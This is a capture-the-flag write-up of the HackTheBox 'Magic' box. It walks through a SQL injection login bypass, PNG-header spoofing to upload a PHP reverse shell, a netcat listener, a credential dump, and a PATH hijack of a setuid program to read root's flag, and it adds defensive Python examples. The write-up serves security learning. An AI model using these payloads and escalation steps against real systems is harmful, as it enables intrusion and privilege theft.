Hello again! Today I'm doing the writeup of Magic, a medium Linux box released on April 18th 2020 on HackTheBox.
If you have VIP access on the website, you can access it here: https://www.hackthebox.eu/home/machines/profile/241
As usual, I'm using nmap to scan for an entry point:
nmap -A -p- -T4 10.10.10.176
I am using the basic options as usual:
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : adjusts the timing template (according to your bandwidth and the speed you're after)
I got the following results:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:27 CEST
Nmap scan report for 10.10.10.185
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/21%OT=22%CT=1%CU=33683%PV=Y%DS=2%DC=T%G=Y%TM=5E9EAF3
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   349.03 ms 10.10.14.1
2   349.02 ms 10.10.10.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.48 seconds
We notice an HTTP server running on port 80, with the http-title being "Magic Portfolio". Not the first portfolio we've had on a HackTheBox machine, and I'm already thinking about malicious file upload.
Let's navigate to the website and take a look.
To perform a malicious file upload, and maybe get a reverse shell, I obviously need a way to upload my file. The inscription in the bottom left corner says "Login". I get a login form, on which I try some basic SQL injections. The first that worked was
' or ''=', but you're welcome to find others 🙂
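Why that payload works, and what the fix looks like, as an added example that is not part of the original writeup and not the box's own code: the login form evidently concatenates the submitted username and password into the SQL text, so the quote in ' or ''=' closes the string literal and the rest becomes grammar. The table name, column names and the "admin" / "correct-horse" row below are constructed for the demo; the same payload is tried against a string-built query and a parameterised one.

```python
import sqlite3


def seed_db() -> sqlite3.Connection:
    """In-memory stand-in for the portfolio's login table (constructed sample data).

    A real application stores a password hash and compares it in code, not a
    plaintext column; that is kept simple here because the point is how the
    query is built, not how the secret is stored.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login (username, password) VALUES (?, ?)", ("admin", "correct-horse"))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: user input becomes part of the SQL grammar.

    With username = password = "' or ''='" the statement turns into
      ... WHERE username='' or ''='' AND password='' or ''=''
    and the trailing ''='' is always true, so a row comes back.
    """
    query = f"SELECT id FROM login WHERE username='{username}' AND password='{password}'"
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the input as data, so quotes in it
    can never change the statement's structure."""
    query = "SELECT id FROM login WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = seed_db()
    payload = "' or ''='"
    print("string-built query, injected input:", vulnerable_login(conn, payload, payload))
    print("parameterised query, injected input:", safe_login(conn, payload, payload))
    print("parameterised query, real credentials:", safe_login(conn, "admin", "correct-horse"))
```

The only difference between the two functions is whether the user's text is spliced into the statement or handed to the driver as a bound parameter; escaping quotes by hand is a much weaker substitute for the latter.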
We are then asked to upload a file. How nice, thank you!
I am going to use a well-known PHP reverse shell, but you can choose another one, or even build your own (it's actually not that hard if you're wondering). Link: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
A filter prevents us from uploading a PHP file. I tried the basic method of appending .png to the file name, but it wasn't enough to fool the filter. It seems to be checking the file's header. So what we need to do is change this header to match the PNG signature.
To do this I retrieved the PNG signature (you can get a list of signatures here: https://en.wikipedia.org/wiki/List_of_file_signatures). I then used a tool called Bless, which is basically a hex editor, to remove the first 8 bytes and replace them with
89 50 4E 47 0D 0A 1A 0A.
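The filter on this box only looks at those eight bytes, which is why pasting in the signature is enough. The following is an added example (not code from the writeup or from the box) of the difference between that signature-only check and a check that walks the PNG chunk structure: the loose check accepts anything that starts with the magic bytes, the strict one requires IHDR first, a valid CRC-32 on every chunk and IEND last with nothing after it. The 1x1 image and the "signature + text" blob are constructed inline for the demo.

```python
import struct
import zlib

# Eight-byte PNG signature, the same bytes the writeup pastes in with Bless.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def naive_is_png(data: bytes) -> bool:
    """Signature-only check: the kind of filter the upload form appears to use."""
    return data[:8] == PNG_SIGNATURE


def strict_is_png(data: bytes) -> bool:
    """Walk the chunk layout the PNG spec requires.

    Accepts only: signature, IHDR as the first chunk (13-byte body), a valid
    CRC-32 on every chunk, IEND as the last chunk, and nothing after IEND.
    A file that is merely prefixed with the signature fails on the first
    length/type field it reads.
    """
    if data[:8] != PNG_SIGNATURE:
        return False
    pos = 8
    first = True
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_field) != 4:
            return False                      # truncated chunk or bogus length field
        if first and (ctype != b"IHDR" or length != 13):
            return False                      # IHDR must be the first chunk
        first = False
        expected_crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        if struct.unpack(">I", crc_field)[0] != expected_crc:
            return False                      # CRC mismatch: not a real chunk
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)           # reject any payload after IEND
    return False                              # ran out of bytes before IEND


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk: length, type, body, CRC-32 over type + body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """A constructed, spec-valid 1x1 greyscale PNG used as the positive sample."""
    # width, height, bit depth, colour type (0 = greyscale), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")         # one scanline: filter byte 0 + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed negative sample: the signature glued onto text that is not a PNG at all.
SIGNATURE_ONLY_SAMPLE = PNG_SIGNATURE + b"<?php echo 'not an image'; ?>\n"


if __name__ == "__main__":
    for name, blob in (("real png", build_minimal_png()), ("signature + text", SIGNATURE_ONLY_SAMPLE)):
        print(f"{name:18} naive={naive_is_png(blob)} strict={strict_is_png(blob)}")
```

Even the strict parser is not a complete defence: a perfectly valid PNG can still carry arbitrary text in a tEXt chunk. The check that actually matters is on the serving side: uploads stored outside the document root, served with a fixed content type, and no script handler enabled for the upload directory, so that whatever bytes a file contains are never executed.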
Our file is ready for upload. If everything went the way it should have, you should get the following message :
The final step of getting access is running our malicious code on the remote server. (I love this sentence, it sounds very hacker-movie-like, don't you think? 🙂)
I used dirbuster to locate the folder where uploaded "images" are stored. I ran
sudo nc -lvp 443
with port 443 being the one I entered in my PHP file (do remember to create a TCP redirection to your computer on this port).
And we got a shell!
After some enumeration, I found a db.php5 file, which clearly refers to a database.
It mentions credentials and a database name. Let's dump that database and see what it holds:
mysqldump Magic -u theseus --password=iamkingtheseus -X
This gives us an XML-formatted version of the SQL script used to load the database, at the state it was in when it was dumped.
1 admin Th3s3usW4sK1ng
Here is our password.
Now that we have credentials, we can use the su command to log in as theseus. This only works if we have a proper terminal. To get one, use the following command:
/usr/bin/script -qc /bin/bash /dev/null
then su theseus with the password we found.
We got user!
To work on a proper terminal, I can first add my SSH key to the ~/.ssh/authorized_keys file, to allow us to SSH into the machine with theseus's profile.
On my machine, I generate a set of SSH keys:
The next step is to copy the content of my ~/.ssh/id_rsa.pub into the authorized_keys of the remote machine.
[email protected]:~/.ssh$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDJnXvUI5MJjKZ6C+nMi06aaZh8JHkwW9nFmkfH8sVEizTHryfhtFLfWK7Djp/5WBQ7cH2WmGR3xBswr++CbKw5XYi0OefhuJIViVa5CiElJehjRsOLLKBN9wOqnDh5WmgQWoq3HjpxIvrd41qxoAm38xb6aJPd1rc7yRNeZXH9G8Qmpo1npQ0XYdwgWLe/Ah+wb3NoQt4Zfmj1jdA42EyXgj69vYmeyQII3dWvj3kbTzcBc6VJvKu9R3F91dfNrZeJDzizolj5olfKvKEwHB2Z1N/b0YsnPp5s7onmnTkZvvPxUEWlHMqqtc8kUt25bvg+hsHrFpSZK/13SlPqe+xzmqfdMT3eeP6wXejl+QPXuSD236DrTPBA60FRSBnaMtJuOxI+bmoHJL2TKSnsmryZvfuOcVsEGRtsewMxKjPzF2oGUlQw938DHe/FRsl1IzgysdKdFzhlHlYkgAC7zZrNfjbDMU+RDgMS+Lrxd7ltlkhZ7uyfXnSVfbFwUgUrsGgWJv4yIDJRnd5+mRfBpP4xn5zEe8y387KSbc1r+AMY3RgVowXYR09BTtd3Wby5vxyzHX4zc0F5M0wbSVmbCZidxIDWZaFIsDX8GHCcgXL8Cqf8NWD32dyhbszLG9X+QPQKNreoos7TJnG75Z8qIhq2JjXHAkviV9gamnvwu7ax5Q== [email protected] >> authorized_keys
Make sure to use >> instead of > to avoid destroying others' work in progress (it appends the key to the file without wiping its content).
Done, we now have proper access to the machine as theseus:
ssh -i id_rsa [email protected]
Run /usr/bin/script -qc /bin/bash /dev/null again to get colour on the terminal. Not essential, but it sure is easier when using enumeration scripts, for example.
Speaking of which, let's upload linPeas.sh and run it:
┌─|Log_s [18:17] :~
└──╼ $ scp linPeas.sh [email protected]:/tmp
linPeas.sh                                    100%  157KB 140.9KB/s   00:01
[email protected]:/tmp$ chmod +x linPeas.sh
[email protected]:/tmp$ ./linPeas.sh > scan.txt
I noticed a file with the setuid bit that isn't usually there in
Indeed, sysinfo isn't a usual file. When running it, I discover lots of information about the system. After digging further and some enumeration by hand, I made the connection between our sysinfo and /usr/bin/lshw. When run, this file displays part of sysinfo's output.
A warning also pops up:
WARNING: you should run this program as super-user.
So sysinfo is probably calling this program with its super-user rights. If we could substitute our own lshw, we could do anything with root privileges on the system.
Let's write this file. We can do a simple
echo 'echo flag :;cat /root/root.txt'>lshw.
Now let's save this file as /tmp/lshw and give it the proper permissions.
[email protected]:/tmp$ echo 'echo flag :;cat /root/root.txt' > lshw
echo 'echo flag :;cat /root/root.txt' > lshw
[email protected]:/tmp$ chmod 777 lshw
The last step before running the exploit is to make sure /bin/sysinfo finds our script before it finds the real one. In order to do so, the PATH needs to reference
This changes the PATH for the current session only. We set PATH to /tmp and append the original value with $PATH; this is essential so that the usual set of commands keeps working. Remember that every entry in the PATH is separated by ":". You can check it yourself by running
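The whole privilege escalation rests on two facts: a shell-style lookup takes the first matching directory in PATH, and /tmp is a directory any user can drop a file into. The following is an added example, not part of the writeup, that makes both facts checkable from the defender's side: resolve_command mimics the left-to-right lookup, and hijackable_entries flags PATH directories an unprivileged user could write to. build_demo constructs a throwaway layout under a temp directory (one dir with mode 1777 standing in for /tmp, one with 0755 standing in for /usr/bin, each holding a harmless placeholder named lshw); it touches no real system path.

```python
import os
import stat
import tempfile


def resolve_command(name: str, path_value: str):
    """Return the executable a shell-style lookup of `name` would pick for this PATH, or None.

    Mirrors the left-to-right search: the first directory holding an executable
    `name` wins, which is exactly why a PATH starting with /tmp shadows /usr/bin/lshw.
    """
    for entry in path_value.split(":"):
        directory = entry or "."             # an empty entry means the current directory
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijackable_entries(path_value: str) -> dict:
    """Map each PATH directory to the reasons an unprivileged user could plant a binary there."""
    findings = {}
    for entry in path_value.split(":"):
        directory = entry or "."
        try:
            st = os.stat(directory)
        except FileNotFoundError:
            findings[directory] = ["missing (could be created if its parent is writable)"]
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            # The sticky bit (as on /tmp) only stops deleting other users' files;
            # it does nothing against creating a brand-new file named lshw.
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            reasons.append("group-writable by a non-root group")
        if st.st_uid != 0:
            reasons.append("not owned by root")
        if reasons:
            findings[directory] = reasons
    return findings


def build_demo() -> dict:
    """Constructed layout under a temp root: 'open' plays /tmp (1777), 'sys' plays /usr/bin (0755)."""
    root = tempfile.mkdtemp(prefix="path-audit-")
    layout = {"open": os.path.join(root, "open"), "sys": os.path.join(root, "bin")}
    for key, directory in list(layout.items()):
        os.mkdir(directory)
        script = os.path.join(directory, "lshw")
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")   # harmless stand-in, prints one line
        os.chmod(script, 0o755)
        layout[key + "_lshw"] = script
    os.chmod(layout["open"], 0o1777)                   # world-writable with sticky bit, like /tmp
    os.chmod(layout["sys"], 0o755)                     # owner-writable only, like /usr/bin
    return layout


if __name__ == "__main__":
    d = build_demo()
    poisoned = d["open"] + ":" + d["sys"]
    print("open dir first  ->", resolve_command("lshw", poisoned))
    print("system dir only ->", resolve_command("lshw", d["sys"]))
    for directory, why in hijackable_entries(poisoned).items():
        print("risky PATH entry:", directory, "->", ", ".join(why))
```

The audit answers "which PATH entries could a local user poison?", which is the question to ask of any setuid or cron-run program. The durable fix belongs in the binary itself: call helpers by absolute path (/usr/bin/lshw) and reset PATH to a fixed, root-owned set of directories before spawning anything, rather than inheriting whatever the caller exported.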
Run the exploit:
And we got the flag!